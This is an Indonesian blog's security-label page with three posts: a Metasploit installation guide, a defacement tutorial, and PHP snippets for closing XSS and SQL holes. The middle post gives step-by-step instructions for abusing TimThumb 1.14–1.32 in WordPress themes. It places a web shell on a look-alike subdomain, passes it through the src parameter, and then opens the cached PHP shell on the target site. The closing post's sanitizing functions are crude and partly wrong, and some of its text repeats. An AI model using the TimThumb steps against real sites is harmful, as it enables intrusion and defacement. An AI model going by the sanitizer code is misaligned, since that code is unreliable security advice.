Showing posts with label Security. Show all posts
Cara Menginstall Metasploit Di Linux
Toturial kali ini adalah Cara Menginstall Metasploit Di Linux tapi sebelum kita memasuki langkah-langkah dari toturial ini alangkah lebih baiknya kita mengetahui apa itu metasploit
Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem.
Metasploit diciptakan oleh HD Moore pada tahun 2003 sebagai sebuah alat jaringan portabel menggunakan bahasa scripting Perl. Kemudian, Metasploit Framework benar-benar ditulis ulang dalam bahasa pemrograman Ruby. Pada tanggal 21 Oktober 2009, Proyek Metasploit mengumumkan yang telah diakuisisi oleh Rapid7, sebuah perusahaan keamanan yang menyediakan solusi kerentanan manajemen terpadu.
Seperti produk komersial yang sebanding seperti kanvas Imunitas atau Inti Dampak Core Security Technologies, Metasploit dapat digunakan untuk menguji kerentanan sistem komputer untuk melindungi mereka atau untuk masuk ke sistem remote. Seperti alat-alat keamanan banyak informasi, Metasploit dapat digunakan untuk kegiatan baik yang sah dan tidak sah. Sejak akuisisi dari Metasploit Framework.
Sudah mengerti bukan apa itu Metasploit ? sekarang mari kita memasuki tahap penginstallan dari aplikasi ini.
1. Download Metasploit.
Download Metasploit
Download Metasploit
2. Rubah permission atau izin menjadi rwxr-xr-x
chmod +x metasploit.run
3. Eksekusi metasploit.run
./metasploit.run
Setelah langkah ke-3 sudah dilakukan ama form wizard seperti gambar dibawah akan muncul.
Klik Forward untuk kelangkah selanjutnya.
Klik Radio Button I accept the agreement, kemudian klik tombol Forward.
Masukan /opt/metasploit pada input text untuk folder instalasi Metasploit.
Klik Radio Button Yes apabila anda ingin Service Metasploit diaktifkan ketika OS anda dihidupkan, apabila tidak ingin aktif otomatis silahkan klik No kemudian klik tombol forward.
Masukan SSL Port menjadi 3790 kemudian klik tombol Forward.
Pada Server Name masukan “localhost” dan Days of validity isi menjadi 3650 dan centang tulisan Yes, trus certificate kemudian klik tombol Forward.
Kemudian tunggu sampai selesai proses penginstallannya.
Nah apabila sudah selesai maka Metasploit siap untuk anda gunakan .
Demikian toturial singkat dari M-Supian.ID bagaimana cara menginstall Metasploit di OS Linux anda. Apabila ada kesalahan dalam toturial ini atau ada yang ingin ditanyakan silahkan beri komentar dibawah ini.
Tutorial Deface Dengan TimThumb 1.14
Okeh sebelum belajar exploit ini saya mau ngejelasin bahwa timthumb ini adalah suatu bug dimana terdapat di semua website wordpress , lebih tepatnya terdapat pada " theme / tema " suatu website ,,,
Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti "
Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti "
no image specified
Query String :
TimThumb version : 1.19
berarti vuln ;) ,, nah yang harus kamu ketahui lagi itu adalah TimThumb version .
Nah jadi target yang bisa kita exploitasi itu timthumb version 1.14 sampai dengan
1.32 ,, Udah ngerti kan ? :) kalo belum ngerti liat aja tutorialnya :) ,, Yuk TKP ..
Alat dan Bahan :
1. Subdomain yang terintegrasi website berikut
: picasa.com
: blogger.com
: flixr.com
sebenarnya ada 5 tapi aku gk hafal U,u ,, contoh " flxr.com.namawebsitekamu.com/shell.php "
, Nah sebelumnya kamu musti upload dulu shell di subdomain kamu yang letaknya di directory
public_html / httpdocs / www / dan macam² ..
2. Otak dan pantang menyerah ;) ..
Exploit :
1. Kali ini saya dah punya target sendiri ,, lihat gambar ..
2. Nah kemudian kalian tambahkan subdomain kalian di ahkir url seperti ini " ?src=http://www.flixr.com.subdomainkamu.com/shell.php " < begitu mas ;) ,, kurang jelas ? lihat gambar ..
3. Tuh liat gambarnya kalo gitu dah " Game Over " namanya ;) .. tinggal buka shellnya aja kan di situ ada tulisan " Unable to open image :" kalo gitu skrng tinggal buka shellnya , caranya copy md5 yang tadi contoh :" /cache/c89de71219ef668b7642e43e04d5d4df.php " masih kurang jelas ? liat gambar ..
4. Nah skrng kita copas ke urlnya jadi " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php " , lihat di bawah ,,5. Selesai deh :D ,,, nah itu kalo ane gk upload shell di subdomainnya tapi upload uploader aja jadi ky gitu ,,
hehe sory yak uploadernya punya pak deb~X ,,
Source : Extreme Crew
post diambil dari SINI
Cara menutup celah XSS dan SQL
Seperti yang kita ketahui bahwa bug SQL dan XSS sangat banyak , sampai saat ini pun masih banyak situs-situs yg mempunyai bug sql dan xss , itu semua karena developers yang malas untuk masalah keamanan dalam website.
Kali ini saya akan sharing cara menutup celah xss dan sql , tujuan postingan kali ini agar yang baru belajar CRUD bisa membiasakan diri untuk menutup sebuah bug sql dan xss.
penutupan celah xss dan sql ini sudah saya terapkan di situs saya pribadi , namun saya masih was-was juga karena semakin hari dan semakin lama dan semakin lampau pasti akan ada yang bisa bypass.
di atas adalah cara untuk menutup sebuah bug xss , nah kalau binggung cara meletakanya gimana nnti saya akan jelaskan di bawah.
di atas adalah cara untuk menutup sebuah bug sql.
nah di atas adalah OOP , jadi kalau mau di terapin di php biasa kalian cuman ambil fungsi di dalam public
semoga bermanfaat dan bila ada yang bingung , silahkan di tanyakan.
Sumber : Post diambil dari Forum IndoXploit yang post oleh Logika Galau
Kali ini saya akan sharing cara menutup celah xss dan sql , tujuan postingan kali ini agar yang baru belajar CRUD bisa membiasakan diri untuk menutup sebuah bug sql dan xss.
penutupan celah xss dan sql ini sudah saya terapkan di situs saya pribadi , namun saya masih was-was juga karena semakin hari dan semakin lama dan semakin lampau pasti akan ada yang bisa bypass.
PHP Code:
public function anti_xss($data){
//$data = htmlspecialchars($data);
$data = htmlentities($data);
$data = strip_tags($data);
$data = filter_var($data, FILTER_SANITIZE_STRING);
return $data;
}
di atas adalah cara untuk menutup sebuah bug xss , nah kalau binggung cara meletakanya gimana nnti saya akan jelaskan di bawah.
PHP Code:
public function anti_sql($id){
$id = is_numeric(htmlspecialchars($id));
if($id){
return true;
}else{
return false;
}
}
nah di atas adalah OOP , jadi kalau mau di terapin di php biasa kalian cuman ambil fungsi di dalam public
semoga bermanfaat dan bila ada yang bingung , silahkan di tanyakan.
Sumber : Post diambil dari Forum IndoXploit yang post oleh Logika Galau
Subscribe to:
Posts (Atom)